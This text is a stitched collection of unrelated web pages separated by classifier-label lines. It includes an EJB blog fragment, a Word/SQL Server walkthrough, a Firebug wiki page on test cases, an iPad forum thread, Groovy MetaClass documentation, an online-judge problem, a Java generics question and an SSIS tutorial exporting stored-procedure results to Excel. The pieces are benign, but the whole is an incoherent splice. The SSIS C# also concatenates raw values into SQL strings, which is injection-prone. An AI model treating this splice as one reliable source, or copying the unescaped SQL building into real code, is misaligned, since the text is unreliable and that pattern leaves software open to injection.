客户端访问该Bean类中的一个方法时,容器生成Bean的一个代理,被叫做远程对象或者本地对象。远程或者 本地对象接收请求,委派它到相应的Bean实例,返回结果给客户端。调用一个Bean中的方法,客户端使用定 义在EJB不是描述文件的名字查找到Bean。在以下实例中,客户端使用上下文对象找到命名为"StateLessejb" Bean。 EJB 客户端实例 import javax.naming.Context; import javax.naming.InitialContext; /** * 一个调用无状态会话Bean中方法的简单的Bean客户端 */ public class CalculateejbClient { public static void main(String [] args) { Context context = new InitialContext(); CalculateEJB myejb = (CalculateEJB)context.lookup("java:comp/env/ejb/CalculateEJB"); myejb.incrementValue(); } } 总结 EJB3.0开发企业JavaBean是相当容易的。此规范使用元数据注释定义Bean的类型和暴露给客户端的方法。 因此,无论你将创建一个执行特定任务的会话Bean还是映射一个表到实体Bean来更新数据,你都能象使用普 通Java对象和接口一样进行处理,在业务方法中使用元注释向客户端暴露方法。既然你已经理解了EJB的基础, 可以到OTN中EJB 3.0 Resources Page发现更多信息。 凡是有该标志的文章,都是该blog博主Caoer(草儿)原创,凡是索引、收藏 、转载请注明来处和原文作者。非常感谢。 posted on 2007-09-02 14:22 草儿 阅读(22453) 评论(1)  编辑  收藏 所属分类: 软件构架JAVA WEB应用 Feedback # re: EJB3.0入门[未登录] 2008-06-27 18:51 sean jboss测试失败。  回复  更多评论    只有注册用户登录后才能发表评论。 网站导航:  
__label__pos
0.82836
Export (0) Print Expand All Walkthrough: Building a Word Document Using SQL Server Data Office 2003   Mary Chipman MCW Technologies, LLC September 2003 Applies to:     Microsoft® Visual Studio® Tools for the Microsoft Office System     Microsoft Office Word 2003     Microsoft Visual Studio .NET 2003 Summary: Shows how you can create customized documents based on Microsoft SQL Server data in code by taking advantage of bookmarks in a Microsoft Office Word 2003 document or template. (14 printed pages) Contents Introduction Prerequisites Getting Started Creating the Document Header Connecting to SQL Server and Inserting the Data Conclusion Introduction In this walkthrough, you will first create a Microsoft® Office Word 2003 document that contains bookmarks as the location for inserting text retrieved from the Microsoft SQL Server Northwind sample database. You will then use ADO.NET to connect to and retrieve the data. You'll insert the data in the Word document at the specified bookmark. Prerequisites To complete this walkthrough, the following software and components must be installed on the development computer: • Microsoft Visual Studio® .NET 2003 or Microsoft Visual Basic® .NET Standard 2003 • Microsoft Visual Studio Tools for the Microsoft Office System • Microsoft Office Professional Edition 2003 • Microsoft SQL Server or Microsoft SQL Server Desktop Engine (MSDE) 7.0 or 2000, with the Northwind sample database installed. This demonstration assumes that you have set up SQL Server/MSDE allowing access using integrated security. Tip   This demonstration assumes that if you're a Visual Basic .NET programmer, you've set the Option Strict setting in your project to On (or have added the Option Strict statement to each module in your project), although it is not required. Setting the Option Strict setting to On requires a bit more code, as you see, but it also ensures that you do not perform any unsafe type conversions. You can get by without it, but in the long run, the discipline required by taking advantage of this option far outweighs the difficulties it adds as you write code. Getting Started First you need to create a Word Document project using Microsoft Visual Studio Tools for the Microsoft Office System. To create a Word Document project 1. From the File menu, point to New, and then click Project to display the New Project dialog box. 2. In the Project Types pane, expand Microsoft Office System Projects, and then select Visual Basic Projects or Visual C# Projects. 3. In the Templates pane, select Word Document. 4. Name the project BuildWordDocSQL, and store it in a convenient local path. 5. Accept the defaults in the Microsoft Office Project Wizard, and click Finish to create the project. Visual Studio .NET opens the ThisDocument.vb or ThisDocument.cs file in the Code Editor for you. Creating the Document Header In this example, you will create a procedure that inserts and formats the document header, and then creates a Bookmark as a marker for inserting text from the Northwind database to create a phone list of suppliers. You will then call the procedure from the Open event handler for the ThisDocument object, although you could also invoke the procedure from a button, menu, or form. All the steps in this section work with a procedure named CreateHeader, which you will create in the first step. To create a document header 1. In the OfficeCodeBehind class, create a procedure called CreateHeader and create variables as needed: ' Visual Basic Private Sub CreateHeader() Dim rng As Word.Range End Sub // C# private void CreateHeader() { Word.Range rng; Object start = Type.Missing; Object end = Type.Missing; Object unit = Type.Missing; Object count = Type.Missing; } 2. Add code to the CreateHeader procedure, clearing any existing contents of the document and setting the section to landscape orientation: ' Visual Basic ' Clear the contents of the document. ThisDocument.Range.Delete() ThisDocument.Sections(1).PageSetup. _ Orientation = Word.WdOrientation.wdOrientLandscape // C# // Clear the contents of the document. ThisDocument.Range(ref start, ref end).Delete(ref unit, ref count); ThisDocument.Sections[1].PageSetup. Orientation = Word.WdOrientation.wdOrientLandscape; 3. Add code that sets up an array of locations for tab settings within the document: ' Visual Basic ' Set up tab locations. Dim tabStops() As Single = {4, 6} // C# // Set up tab locations. Single[] tabStops = new Single[] {4, 6}; 4. Add code to the CreateHeader procedure that creates a Range object consisting of the empty paragraph mark that is the only character in the document: ' Visual Basic rng = ThisDocument.Range(0, 0) // C# start = 0; end = 0; rng = ThisDocument.Range(ref start, ref end); 5. Add code to insert and format the title text in the document and format it: ' Visual Basic ' Insert the header. rng.InsertBefore("Supplier Phone List") rng.Font.Name = "Verdana" rng.Font.Size = 16 rng.InsertParagraphAfter() rng.InsertParagraphAfter() // C# // Insert the header. rng.InsertBefore("Supplier Phone List"); rng.Font.Name = "Verdana"; rng.Font.Size = 16; rng.InsertParagraphAfter(); rng.InsertParagraphAfter(); 6. Add code to reset the active range, and retrieve the paragraph format for the range: ' Visual Basic ' Create a new range at the insertion point. rng.SetRange(Start:=rng.End, End:=rng.End) Dim fmt As Word.ParagraphFormat = rng.ParagraphFormat // C# // Create a new range at the insertion point. rng.SetRange(rng.End, rng.End); Word.ParagraphFormat fmt = rng.ParagraphFormat; 7. Add code to set up the tabs for the column headers: ' Visual Basic ' Set up the tabs for the column headers. fmt.TabStops.ClearAll() fmt.TabStops.Add( _ ThisApplication.InchesToPoints(tabStops(0)), _ Word.WdTabAlignment.wdAlignTabLeft, _ Word.WdTabLeader.wdTabLeaderSpaces) fmt.TabStops.Add( _ ThisApplication.InchesToPoints(tabStops(1)), _ Word.WdTabAlignment.wdAlignTabLeft, _ Word.WdTabLeader.wdTabLeaderSpaces) // C# // Set up the tabs for the column headers. Object alignment = Word.WdTabAlignment.wdAlignTabLeft; Object leader = Word.WdTabLeader.wdTabLeaderSpaces; fmt.TabStops.ClearAll(); fmt.TabStops.Add(ThisApplication.InchesToPoints(tabStops[0]), ref alignment, ref leader); alignment = Word.WdTabAlignment.wdAlignTabLeft; leader = Word.WdTabLeader.wdTabLeaderSpaces; fmt.TabStops.Add(ThisApplication.InchesToPoints(tabStops[1]), ref alignment, ref leader); 8. Add code to create the Company Name, Contact, and Phone headings, separated by tabs: ' Visual Basic ' Insert the column header text and formatting. rng.Text = _ "Company Name" & ControlChars.Tab & _ "Contact" & ControlChars.Tab & _ "Phone Number" rng.Font.Name = "Verdana" rng.Font.Size = 10 rng.Font.Bold = CLng(True) rng.Font.Underline = Word.WdUnderline.wdUnderlineSingle // C# // Insert the column header text and formatting. rng.Text = "Company Name\tContact\tPhone Number"; rng.Font.Name = "Verdana"; rng.Font.Size = 10; rng.Font.Bold = Convert.ToInt32(true); rng.Font.Underline = Word.WdUnderline.wdUnderlineSingle; 9. Add code to create a range at the current insertion point, and retrieve the paragraph format associated with this range: ' Visual Basic ' Create a new range at the insertion point. rng.InsertParagraphAfter() rng.SetRange(Start:=rng.End, End:=rng.End) fmt = rng.ParagraphFormat // C# // Create a new range at the insertion point. rng.InsertParagraphAfter(); rng.SetRange(rng.End, rng.End); fmt = rng.ParagraphFormat; 10. Add code to recreate the same tab stops at the new insertion point, but with dot leaders instead of spaces: ' Visual Basic ' Set up the tabs for the columns. fmt.TabStops.ClearAll() fmt.TabStops.Add( _ ThisApplication.InchesToPoints(tabStops(0)), _ Word.WdTabAlignment.wdAlignTabLeft, _ Word.WdTabLeader.wdTabLeaderDots) fmt.TabStops.Add( _ ThisApplication.InchesToPoints(tabStops(1)), _ Word.WdTabAlignment.wdAlignTabLeft, _ Word.WdTabLeader.wdTabLeaderDots) // C# // Set up the tabs for the columns. fmt.TabStops.ClearAll(); alignment = Word.WdTabAlignment.wdAlignTabLeft; leader = Word.WdTabLeader.wdTabLeaderDots; fmt.TabStops.Add(ThisApplication.InchesToPoints(tabStops[0]), ref alignment, ref leader); fmt.TabStops.Add(ThisApplication.InchesToPoints(tabStops[1]), ref alignment, ref leader); 11. Add code to create a Bookmark named Data at the insertion point, and insert a paragraph after the Bookmark. ' Visual Basic ' Insert a bookmark to use for the inserted data. ThisDocument.Bookmarks.Add( _ Name:="Data", Range:=DirectCast(rng, System.Object)) rng.InsertParagraphAfter() // C# // Insert a bookmark to use for the inserted data. Object range = rng; ThisDocument.Bookmarks.Add("Data", ref range); rng.InsertParagraphAfter(); 12. Add code in the ThisDocument_Open() event handler to call the CreateHeader procedure, turning screen updating off and back on again: ' Visual Basic Private Sub ThisDocument_Open() Handles ThisDocument.Open Try ThisApplication.ScreenUpdating = False CreateHeader() Finally ThisApplication.ScreenUpdating = True End Try End Sub // C# protected void ThisDocument_Open() { try { ThisApplication.ScreenUpdating = false; CreateHeader(); } finally { ThisApplication.ScreenUpdating = true; } } Save your work and test by running the project. You should see the headings for the phone list, as shown in Figure 1. If you have turned on the display of Bookmarks, you should see the Data Bookmark as an I-beam directly under Company Name. Close the document when you're done (you can save the changes if you like) and return to Visual Studio .NET. Figure 1. The phone list before the data is added Connecting to SQL Server and Inserting the Data Once you have set up the phone list, you will create a new procedure to connect to the Suppliers table in the Northwind SQL Server database. You will then insert the data at the bookmark you defined. You will call the procedure from the Open event handler for the ThisDocument object. To insert data from the database 1. Scroll to the top of the open code file and type the following statement: ' Visual Basic Imports System.Data.SqlClient // C# using System.Data; using System.Data.SqlClient; 2. Scroll to the end of the CreateHeader procedure in the OfficeCodeBehind class, and add a new procedure named RetrieveSuppliers: ' Visual Basic Private Sub RetrieveSuppliers() End Sub // C# private void RetrieveSuppliers() { } 3. Within RetrieveSuppliers, add code to create the variables your procedure will need: ' Visual Basic Dim cnn As SqlConnection Dim dr As SqlDataReader Dim cmd As SqlCommand Dim rng As Word.Range Dim sw As New System.IO.StringWriter // C# SqlConnection cnn; SqlCommand cmd; SqlDataReader dr = null; Word.Range rng; System.IO.StringWriter sw = new System.IO.StringWriter(); 4. Add code to create a String variable to create a SELECT statement, selecting the CompanyName, ContactName, and Phone fields from the Suppliers table. ' Visual Basic ' Set up the command text: Dim strSQL As String = _ "SELECT CompanyName, ContactName, Phone " & _ "FROM Suppliers ORDER BY CompanyName" // C# // Set up the command text: string strSQL = "SELECT CompanyName, ContactName, Phone " + "FROM Suppliers ORDER BY CompanyName"; 5. Add code to create an exception-handling block that displays the Exception.Message value using the MessageBox.Show method if an exception occurs: ' Visual Basic Try Catch ex As Exception MessageBox.Show(ex.Message, ThisDocument.Name) Finally End Try // C# try { } catch (Exception ex) { MessageBox.Show(ex.Message, ThisDocument.Name); } finally { } 6. Add code in the Try block to open the connection to the local SQL Server database: ' Visual Basic ' Create the connection: cnn = New SqlConnection( _ "Data Source=(local);Database=Northwind;Integrated Security=True") cnn.Open() // C# // Create the connection: cnn = new SqlConnection( "Data Source=(local);Database=Northwind;" + "Integrated Security=true"); cnn.Open(); 7. Add code to create the Command object and retrieve the data reader: ' Visual Basic ' Create the command and retrieve the data reader: cmd = New SqlCommand(strSQL, cnn) dr = cmd.ExecuteReader(CommandBehavior.CloseConnection) // C# // Create the command and retrieve the data reader: cmd = new SqlCommand(strSQL, cnn); dr = cmd.ExecuteReader(CommandBehavior.CloseConnection); 8. Add code to loop through the data, building up a string containing the data and the tab separators: ' Visual Basic ' Loop through the data, creating tab-delimited output: While dr.Read() sw.WriteLine("{0}{1}{2}{3}{4}", _ dr(0), ControlChars.Tab, _ dr(1), ControlChars.Tab, dr(2)) End While // C# // Loop through the data, creating tab-delimited output: while (dr.Read()) { sw.WriteLine("{0}\t{1}\t{2}", dr[0], dr[1], dr[2]); } 9. Add code to insert the delimited string into the bookmark you created earlier, and format the text: ' Visual Basic ' Work with the previously created bookmark: rng = ThisDocument.Bookmarks("Data").Range rng.Text = sw.ToString() rng.Font.Name = "Verdana" rng.Font.Size = 10 // C# // Work with the previously created bookmark: Object item = "Data"; Word.Bookmark bmk = (Word.Bookmark) ThisDocument.Bookmarks.get_Item(ref item); rng = bmk.Range; rng.Text = sw.ToString(); rng.Font.Name = "Verdana"; rng.Font.Size = 10; 10. Add code in the Finally block to clean up any open data objects: ' Visual Basic If Not dr Is Nothing Then dr.Close() End If // C# if (dr != null ) { dr.Close(); } 11. Add code in the ThisDocument.Open event handler to call the procedure, after the code that calls the CreateHeader procedure, so that the procedure looks like the following: ' Visual Basic Private Sub ThisDocument_Open() Handles ThisDocument.Open Try ThisApplication.ScreenUpdating = False CreateHeader() RetrieveSuppliers() Finally ThisApplication.ScreenUpdating = True End Try End Sub // C# protected void ThisDocument_Open() { try { ThisApplication.ScreenUpdating = false; CreateHeader(); RetrieveSuppliers(); } finally { ThisApplication.ScreenUpdating = true; } } Save your work and test by running the project. Figure 2 shows a partial view of the completed phone list. Figure 2. The completed supplier phone list Conclusion In this walkthrough, you learned how you can take advantage of bookmarks in a Word document or template to create customized documents based on SQL Server data in code. Using Visual Studio Tools for the Microsoft Office System to create your project and ADO.NET to connect to the data, you can insert data into a Word document at a specified bookmark. Show: © 2015 Microsoft
__label__pos
0.953003
Creating a Test Case From FirebugWiki (Difference between revisions) Jump to: navigation, search m (Refined the wording inside the Requirements section) m (Fixed link to issue 537)   (One intermediate revision not shown) Line 47: Line 47: === Templates === === Templates === To help you with creating test cases we provide some templates. You can use one of the templates below: To help you with creating test cases we provide some templates. You can use one of the templates below: - * [https://github.com/firebug/firebug/blob/master/tests/templates/default/issueXXXX.html Default HTML template] - Common template used for normal purposes + * [https://getfirebug.com/tests/templates/manual/issueXXXX.html Default HTML template] - Common template used for normal purposes - * [https://github.com/firebug/firebug/blob/master/tests/templates/default/issueXXXXSeveralCases.html Enhanced HTML template] - Template including two cases and some example elements + * [https://getfirebug.com/tests/templates/manual/issueXXXXSeveralCases.html Enhanced HTML template] - Template including two cases and some example elements To adjust these templates please follow the steps below: To adjust these templates please follow the steps below: Line 108: Line 108: '''Single tests:''' '''Single tests:''' - * [https://github.com/firebug/firebug/blob/master/tests/templates/default/issueXXXX.html Default HTML template] - Common template used for normal purposes + * [https://getfirebug.com/tests/templates/automated/issueXXXX.html Default HTML template] - Common template used for normal purposes - * [https://github.com/firebug/firebug/blob/master/tests/templates/default/issueXXXX.js Template for single tests] - JavaScript template for single automated tests covering an issue + * [https://getfirebug.com/tests/templates/automated/issueXXXX.js Template for single tests] - JavaScript template for single automated tests covering an issue '''Multiple tests:''' '''Multiple tests:''' - * [https://github.com/firebug/firebug/blob/master/tests/templates/default/issueXXXXSeveralCases.html Enhanced HTML template] - Template including two cases and some example elements + * [https://getfirebug.com/tests/templates/automated/issueXXXXSeveralCases.html Enhanced HTML template] - Template including two cases and some example elements - * [https://github.com/firebug/firebug/blob/master/tests/templates/default/issueXXXXSeveralCases.js Template test suites] - JavaScript template for several automated tests covering an issue + * [https://getfirebug.com/tests/templates/automated/issueXXXXSeveralCases.js Template test suites] - JavaScript template for several automated tests covering an issue You will have to adjust this template using the [[Firebug Automated Test API|automated test API]]. You will have to adjust this template using the [[Firebug Automated Test API|automated test API]]. Line 122: Line 122: Also see some live examples: Also see some live examples: - * [https://getfirebug.com/tests/head/css/537/issue537.html Issue 537] + * [https://getfirebug.com/tests/head/html/style/537/issue537.html Issue 537] * [https://getfirebug.com/tests/head/css/1338/issue1338.html Issue 1338] * [https://getfirebug.com/tests/head/css/1338/issue1338.html Issue 1338] * [https://getfirebug.com/tests/head/css/3652/issue3652.html Issue 3652] * [https://getfirebug.com/tests/head/css/3652/issue3652.html Issue 3652] Latest revision as of 07:24, 21 February 2014 We need a simple page, that we can open in the browser and use for manual testing to work on an issue Contents [edit] General info We can only work on issues, that we can reproduce. Therefore it is very important to have simple test cases for the bug you're seeing or the feature you are missing in Firebug. A test case MUST include precise step by step instructions how to reproduce it and a description of what you expect to see. Also, if your steps to reproduce require a file, then please provide that file instead of posting lines of code. This makes it a lot easier for other people to reproduce your test case. If you provide a test case file, you should also provide the following additional information: • The issue number • The issue summary • Observed results (in case of bugs) • Contact information (so we can get back to you in case of questions) [edit] Manual tests [edit] How to create To create a manual test case you can either provide a publicly accessible URL or create a specific a test case file. Please note again, that it is essential to give clear steps to reproduce your issue. You can add additional material like screenshots, videos, links to discussions etc. or offer RDP access to your computer. Though they are not a replacement for a proper test case, since others should also be able to reproduce the problem by their own. [edit] Test cases for enhancements Also for enhancements we want you to create a simple test case, so we are able to implement a feature/make a change as you imagine it. So how can you provide a test case for something, that doesn't exist yet? Pretty simple: Like for bug descriptions you can create step by step instructions of how you imagine the changes. [edit] Example You want a new option inside the Net Panel, that allows you to copy the file name of a request. 1. Open Firebug on this page 2. Enable and switch to the Net panel 3. Reload the page via F5 4. Right-click the request for "Creating_a_Test_Case" => The context menu for the request appears. 5. Click the menu item "Copy file name" inside the context menu (not existing yet)   => The file name "Creating_a_Test_Case" should be copied to the clipboard [edit] Templates To help you with creating test cases we provide some templates. You can use one of the templates below: To adjust these templates please follow the steps below: 1. Replace "xxxx" by number of your issue 2. Replace "Issue summary" by title of your issue 3. Put inspectable elements, form fields etc. into the "content" section 4. Add the exact steps to reproduce your issue under "Steps to reproduce" 5. Describe the currently seen result under "Observed result" 6. Describe what you would expect to see under "Expected result" 7. Add your contact information 8. Remove all template comments [edit] Examples There are already some examples, which can be used as reference: [edit] Automated tests [edit] Requirements To run the FBTests you first need to install FBTest. In order to run the test suite on your machine you'll need to set up a local web server. For example you can use the Apache HTTP Server. To be able to access the FBTests through the web server, you have to create a mapping. For Apache you can achieve this by adding an alias to your httpd.conf file, which could look like this: # Firebug FBTests Alias /fbtests "/path/to/your/fbtests/folder" <Directory "/path/to/your/fbtests/folder"> Options Indexes FollowSymLinks AllowOverride all Order allow,deny Allow from all </Directory> Doing so you can access the test cases via http://127.0.0.1/fbtests. [edit] How to create For the creation of an automated test, which will be part of the FBTest suite you need at least two parts. An HTML file and a JavaScript file, which executes the test. To create the HTML page for the automated test case please follow the steps for the manual tests. The only thing you do not need for FBTests is the section with the observed results. The automated (JavaScript based) test case should include the exact same steps as when manually executing the test case, i. e. instead of calling an internal Firebug function directly you should call the UI functions, that will call the internal function. So for example instead of calling the editNewAttribute() method for a specific node inside the HTML Panel you should programmatically open the context menu at it and choose the option "New Attribute...". FBTest already provides several APIs, which encapsulates such logic, like in this case the function FBTest.executeContextMenuCommand(). [edit] Steps for creating FBTests 1. Copy the two templates linked below to a subdirectory named after the issue number of the right group inside the /tests/content/ directory of your local copy of the repository. Example: /tests/content/net/5324/. 2. Add a new line to /tests/content/firebug.html and specify the group, the absolute URL path to the JavaScript file of your test case, a description of the form "Issue xxxx: Issue summary" and the absolute URL path to the HTML page. Example: {group: "commandLine", uri: "commandLine/5042/issue5042.js", desc: "Issue 5042: Command Line should not prevent tabbing out when empty", testPage: "commandLine/5042/issue5042.html"} 3. Edit the HTML file following the steps described in the template. 4. Edit the JavaScript file following the steps described in the template. An FBTest normally opens the HTML file in a new browser tab via FBTest.openNewTab(). Furthermore it must contain a call to FBTest.testDone(), which indicates the end of the test. [edit] Templates Two templates are available for automated tests: Single tests: Multiple tests: You will have to adjust this template using the automated test API. [edit] Examples There are also some examples for how to create automated tests. Also see some live examples: Personal tools
__label__pos
0.683661
Skip to end of metadata Go to start of metadata Evaluating the MetaClass runtime Since 1.1, Groovy supports a much richer set of APIs for evaluating the MetaClass runtime. Using these APIs in combination with ExpandoMetaClass makes Groovy an extremely powerful language for meta-programming Finding out methods and properties To obtain a list of methods ( or MetaMethod instances in Groovy speak) for a particular Groovy class use can inspect its MetaClass: The same can be done for properties: Using respondsTo and hasProperty Obtaining a list of methods sometimes is a little more than what you want. It is quite common in meta-programming scenarios to want to find out if an object supports a particular method. Since 1.1, you can use respondsTo and hasProperty to achieve this: The respondsTo method actually returns a List of MetaMethod instances so you can use it to both query and evaluate the resulting list. Icon respondsTo only works for "real" methods and those added via ExpandoMetaClass and not for cases where you override invokeMethod or methodMissing. It is impossible in these cases to tell if an object responds to a method without actually invoking the method. • No labels 1 Comment 1. Wouldn't the last example be more intuitive and readable if the last part was rewritten to
__label__pos
0.959345
Hide books Discussion in 'iPad Help' started by qtwilson, Apr 13, 2012. 1. qtwilson qtwilson iPF Noob Joined: Apr 13, 2012 Messages: 1 Thanks Received: 0 Trophy Points: 0 Location: Phoenix, AZ Ratings: +0 / 0 Is there a way to hide books?   2. twerppoet twerppoet iPad Legend Joined: Jan 8, 2011 Messages: 17,937 Thanks Received: 2,810 Trophy Points: 113 Location: Walla Walla, WA Ratings: +3,553 / 3 You can delete them. They will still be available in the Purchased tab of the iBooks Store so you can download them again. If you wish to hide them in the iBook Store's Purchased tab just swipe across them and tap the Hide button that appears.   3. King1968 King1968 iPF Noob Joined: May 27, 2012 Messages: 1 Thanks Received: 0 Trophy Points: 0 Location: England Ratings: +0 / 0 Delete not hide? Is there a way to delete totally?   Share This Page Search tags for this page hide a book on ipad , hide ipad purchased books , hiding books on ipad , how do you hide books on ipad , how to hide books in ibooks , how to hide books in ibooks on ipad , how to hide books on ipad , how to hide ibooks on ipad , how to hide purchased books on ipad , is there a way to hide books on ipad
__label__pos
0.999263
11401140 SUSTech Online Judge Problem 1140 --Combine polynomials 1140: Combine polynomials Time Limit: 1 Sec  Memory Limit: 128 MB Submit: 2918  Solved: 301 [Submit][Status][Web Board] Description Linked List is one of  most simple and fundamental data structure, thus it has a very wide application.  For example, linked list can be used to calculate the sum of two polynomials. Now, given two polynomials by the coefficient and exponent of each term(exponent of each term is in ascending order), please output the sum of the two polynomials. Input First line will be a positive integer T (T<=100), which is the number of test cases. The first line will be an integer n, which is the number of terms of the first polynomial. Then n lines will be the coefficients and exponents of the terms. After n + 1 lines, there will be an integer m for the number of terms of the second polynomial. And m lines of (coefficient, exponent) pairs. (0 <= n, m <= 1000, all exponents are in the range [0, 109], all coefficients are in the range [-10000, 10000]) Output For each test case, print the polynomial in ascending order of each exponents. Be attention to the format of the polynomial. Sample Input 2 2 1 2 2 3 2 2 2 1 4 2 2 0 -2 1 2 3 1 1 2 Sample Output 3x^2+2x^3+x^4 2+x+x^2 HINT Source   [Submit][Status]
__label__pos
0.955734
Fabian N. Fabian N. - 8 months ago 39 Java Question Creating a instance of a typed class with a variable in java I have a class with a type public class Scan<T extends Data>{ ... } Data is a abstract type, from which I have some Implementations. Now I want some kind of chooser, which implementation to use. Is this possible? If yes, which type must the variable have (I tried with Class , but this does not work) Class datatype; switch(datatypeInt){ case 2: datatype = Simple3DData.class; break; case 1: default: datatype = Simple2DData.class; } Scan<datatype> scan = new Scan<>(); (Obvious this does not work) I can't instantiate Scan in the switch block, because I will also choose the Scan class at some point dynamically. EDIT: I see, this is not possible that easy, I will try convert the code, not to use types, rather replacing all my T by Data and passing the Class object as parameter for my Scan. Answer What you try to achieve cannot work because type parameters are only used at compile time by the compiler to make sure that your code is compliant with the types defined in order to avoid getting at runtime exceptions of type ClassCastException. At runtime, type parameters don't even exist anymore due to type erasure, such that your code would be something like this: Class datatype; switch(datatypeInt){ case 2: datatype = Simple3DData.class; break; case 1: default: datatype = Simple2DData.class; } Scan = new Scan(); Which means that you need to specify the class explicitly, so your code could be something like this: Class<? extends Data> datatype; switch(datatypeInt){ case 2: datatype = Simple3DData.class; break; case 1: default: datatype = Simple2DData.class; } Scan scan = new Scan(datatype); A much more OO approach could be to implement the strategy pattern, you could have one scanning strategy per type of data, the code would then be: ScanStrategy strategy; switch(datatypeInt){ case 2: strategy = new Simple3DDataScanner(); break; case 1: default: strategy = new Simple2DDataScanner(); } Scan scan = new Scan(strategy);
__label__pos
0.96616
How to create Excel File Dynamically for Stored Procedure Results in SSIS Package by using Script Task - SSIS Tutorial Scenario: Download Script You are working as ETL Developer / SSIS Developer and you need to create an SSIS Package that should execute Stored Procedure from SQL Server database and create an excel file for data returned by Stored Procedure. Let's assume that in in scenario, the Stored Procedure does not accept any parameters.  Often Stored Procedures are created to run bunch of queries to generate final results and load that to Excel file. Your Stored Procedure might be using pivot and it can return different columns on each execution. Our SSIS Package should be able to handle this situation. It should always create an Excel file whatever columns are returned by Stored Procedure. The excel file should be generate with Datetime on each execution.  Solution: If we try to create this SSIS Package with Excel Destination,It is going to be very hard to handle situations when number of columns returned by Stored Procedure change. we often have to edit the SSIS Package to handle this situation. We are going to use Script task so we don't have to worry if Stored Procedure definition change. As long as it will return us the data, we will dump into new Excel file on each execution. here is my sample Stored Procedure.  Create Procedure Dbo.usp_TotalSale AS BEGIN Select * From [dbo].[TotalSale] END Log File Information : In case your SSIS Package fail. Log file will be created in the same folder where your Excel File will be created. It will have the same datetime like your Excel File. Step 1: Create Variables to make your SSIS Package Dynamic Create your SSIS Package in SSDT ( SQL Server Data Tools).  Once SSIS Package is created. Create below variables.  ExcelFileName : Provide the name of your Excel File that you would like to create FolderPath: This will save where you would like to create Excel File SheetName: Provide the Sheet Name you like to have in your Excel File StoredProcedureName: Provide the Stored Procedure Name with Schema that you would like to execute and dump data to newly created Excel File. Create Variables in SSIS Package to Create Excel File Dynamically from Stored Procedure in Script Task Step 2: Create ADO.NET Connection in SSIS Package to use in Script Task Create ADO.NET Connection Manager so we can use in Script Task to Load data from Excel Sheets to SQL Server Table. Create ADO.NET Connection in SSIS Package to use in Script Task to execute Stored Procedure and Dump Data to Excel File on each execution Step3: Add Variables to Script Task to use from SSIS Package Bring the Script Task on Control Flow Pane in SSIS Package and open by double clicking Check-box in front of variable to add to Script Task. Use variables in Script Task in SSIS Package to generate Excel dynamically from Stored Procedure Step 4: Add Script to Script task Editor in SSIS Package To create Excel File for Stored Procedure Results Click Edit Button and it will open Script Task Editor. Under #region Namespaces, I have added below code using System.IO; using System.Data.OleDb; using System.Data.SqlClient; Under public void Main() {  I have added below code.  string datetime = DateTime.Now.ToString("yyyyMMddHHmmss"); try { //Declare Variables string ExcelFileName = Dts.Variables["User::ExcelFileName"].Value.ToString(); string FolderPath = Dts.Variables["User::FolderPath"].Value.ToString(); string StoredProcedureName = Dts.Variables["User::StoredProcedureName"].Value.ToString(); string SheetName = Dts.Variables["User::SheetName"].Value.ToString(); ExcelFileName = ExcelFileName + "_" + datetime; OleDbConnection Excel_OLE_Con = new OleDbConnection(); OleDbCommand Excel_OLE_Cmd = new OleDbCommand(); //Construct ConnectionString for Excel string connstring = "Provider=Microsoft.ACE.OLEDB.12.0;" + "Data Source=" + FolderPath + ExcelFileName + ";" + "Extended Properties=\"Excel 12.0 Xml;HDR=YES;\""; //drop Excel file if exists File.Delete(FolderPath + "\\" + ExcelFileName + ".xlsx"); //USE ADO.NET Connection from SSIS Package to get data from table SqlConnection myADONETConnection = new SqlConnection(); myADONETConnection = (SqlConnection)(Dts.Connections["DBConn"].AcquireConnection(Dts.Transaction) as SqlConnection); //Load Data into DataTable from SQL ServerTable // Assumes that connection is a valid SqlConnection object. string queryString = "EXEC " + StoredProcedureName; SqlDataAdapter adapter = new SqlDataAdapter(queryString, myADONETConnection); DataSet ds = new DataSet(); adapter.Fill(ds); //Get Header Columns string TableColumns = ""; // Get the Column List from Data Table so can create Excel Sheet with Header foreach (DataTable table in ds.Tables) { foreach (DataColumn column in table.Columns) { TableColumns += column + "],["; } } // Replace most right comma from Columnlist TableColumns = ("[" + TableColumns.Replace(",", " Text,").TrimEnd(',')); TableColumns = TableColumns.Remove(TableColumns.Length - 2); //MessageBox.Show(TableColumns); //Use OLE DB Connection and Create Excel Sheet Excel_OLE_Con.ConnectionString = connstring; Excel_OLE_Con.Open(); Excel_OLE_Cmd.Connection = Excel_OLE_Con; Excel_OLE_Cmd.CommandText = "Create table " + SheetName + " (" + TableColumns + ")"; Excel_OLE_Cmd.ExecuteNonQuery(); //Write Data to Excel Sheet from DataTable dynamically foreach (DataTable table in ds.Tables) { String sqlCommandInsert = ""; String sqlCommandValue = ""; foreach (DataColumn dataColumn in table.Columns) { sqlCommandValue += dataColumn + "],["; } sqlCommandValue = "[" + sqlCommandValue.TrimEnd(','); sqlCommandValue = sqlCommandValue.Remove(sqlCommandValue.Length - 2); sqlCommandInsert = "INSERT into " + SheetName + "(" + sqlCommandValue+ ") VALUES("; int columnCount = table.Columns.Count; foreach (DataRow row in table.Rows) { string columnvalues = ""; for (int i = 0; i < columnCount; i++) { int index = table.Rows.IndexOf(row); columnvalues += "'" + table.Rows[index].ItemArray[i] + "',"; } columnvalues = columnvalues.TrimEnd(','); var command = sqlCommandInsert + columnvalues + ")"; Excel_OLE_Cmd.CommandText = command; Excel_OLE_Cmd.ExecuteNonQuery(); } } Excel_OLE_Con.Close(); Dts.TaskResult = (int)ScriptResults.Success; } catch (Exception exception) { // Create Log File for Errors using (StreamWriter sw = File.CreateText(Dts.Variables["User::FolderPath"].Value.ToString() + "\\" + Dts.Variables["User::ExcelFileName"].Value.ToString() + datetime + ".log")) { sw.WriteLine(exception.ToString()); Dts.TaskResult = (int)ScriptResults.Failure; } } Step 5:  Save the script in Script Task Editor and close the window. Run your SSIS Package.In script task, it is going to execute Stored Procedure and them dump the results returned by stored procedure to Excel file.  I executed my SSIS Package couple of times and it generated excel files as shown below. How to load Stored Procedure results to Excel File Dynamically in SSIS Package by using Script Task -C # Scripting Language Check out our other posts/videos for Dynamic Excel Source and Destination 1. How to Load Data from Excel Files when Number of Columns can decrease or order is changed in Excel Sheet 2. How to Load Only Matching Column Data to SQL Server Table from Multiple Excel Files (Single Sheet per file) Dynamically in SSIS Package 3. How to Load Excel File Names with Sheet Names ,Row Count,Last Modified Date, File Size in SQL Server Table 4. How to Load Multiple Excel Files with Multiple Sheets to Single SQL Server Table by using SSIS Package 5. How to Load Matching Sheets from Excel to Table and Log Not Matching Sheets Information in SQL Server Table 6. How to 